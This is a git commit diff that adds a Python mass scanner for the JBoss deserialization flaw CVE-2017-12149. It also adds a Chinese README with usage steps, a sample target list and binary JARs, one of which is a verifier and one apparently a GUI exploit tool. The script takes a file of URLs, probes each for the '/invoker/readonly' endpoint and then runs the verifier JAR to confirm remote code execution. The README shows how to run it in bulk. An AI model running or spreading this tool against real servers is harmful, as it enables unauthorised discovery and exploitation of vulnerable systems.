88ai · 88ai · Dec 11, 2017 · Dec 11, 2017 · Dec 11, 2017 · Dec 11, 2017
diff --git a/Jboss-cve201712149-pl.py b/Jboss-cve201712149-pl.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python
+#coding:utf-8
+#author:Ja0k
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+import os,sys,requests
+import urllib3
+urllib3.disable_warnings()
+
+#access http://*.*.*.*/invoker/readonly return 500
+def url_Test(url):
+    POC_url="/invoker/readonly"
+    headers={"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
+             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+            "Accept-Encoding": "gzip, deflate",
+            "Connection": "close",
+            "Upgrade-Insecure-Requests": "1",
+            "Content-Type": "application/x-www-form-urlencoded"}
+    try:
+        code=requests.get(url+POC_url,headers=headers,timeout=5,verify=False).status_code
+        if code == int(500):
+            print "%s/invoker/readonly maybe use HttpInvoker! \n" %url
+            return True
+    except requests.exceptions.ConnectionError, e:
+        pass 
+
+#POC RCE
+def Poc_Test(url):  
+    output=os.popen("java -jar verify_CVE-2017-12149.jar %s" %url) 
+    if "vuln"in output.read():
+        print "%s is  Vul-Jboss-cve-2017-12149! \n" %url
+
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print "Usage: %s urllist.txt \nurl-format:http://1.1.1.1:8080" %sys.argv[0]
+        exit()
+    for i in open(sys.argv[1],'r').readlines():
+        url=i.strip()
+        if  url_Test(url):
+            Poc_Test(url)
diff --git a/README.md b/README.md
@@ -1,2 +1,31 @@
-# vuln
-python/vul/poc/exp/
+# 
+1.jboss反序列化_CVE-2017-12149.jar GUI
+jboss-_CVE-2017-12149
+
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+
+2.漏洞验证
+verify_CVE-2017-12149.jar提供命令行模式下验证漏洞,如果漏洞存在返回特征字符串,只需要执行命令:
+
+```shell/cmd
+$ java -jar verify_CVE-2017-12149.jar http://xxx:8080
+
+#成功返回:
+vuln6581362514513155613jboss
+```
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+
+3.批量验证漏洞(支持http/https协议)
+```shell/cmd
+$ python Jboss-cve201712149-pl.py urllist.txt
+```
+urllist.txt-format:
+http://1.1.1.1:8080
+```
+#成功返回:
+```
+http://192.168.1.10:8080/invoker/readonly maybe use HttpInvoker! 
+http://192.168.1.10:8080 is  Vul-Jboss-cve-2017-12149! 
+```
+ps：py运行需要安装requests 库
+pip install requests
diff --git a/jboss_CVE-2017-12149/1 b/jboss_CVE-2017-12149/1
@@ -0,0 +1 @@
+1
diff --git a/jboss反序列化_CVE-2017-12149.jar b/jboss反序列化_CVE-2017-12149.jar
diff --git a/urllist.txt b/urllist.txt
@@ -0,0 +1 @@
+http://192.168.1.10:8080
diff --git a/verify_CVE-2017-12149.jar b/verify_CVE-2017-12149.jar
diff --git a/截图.jpg b/截图.jpg
diff --git a/截图2.png b/截图2.png
diff --git a/截图3.png b/截图3.png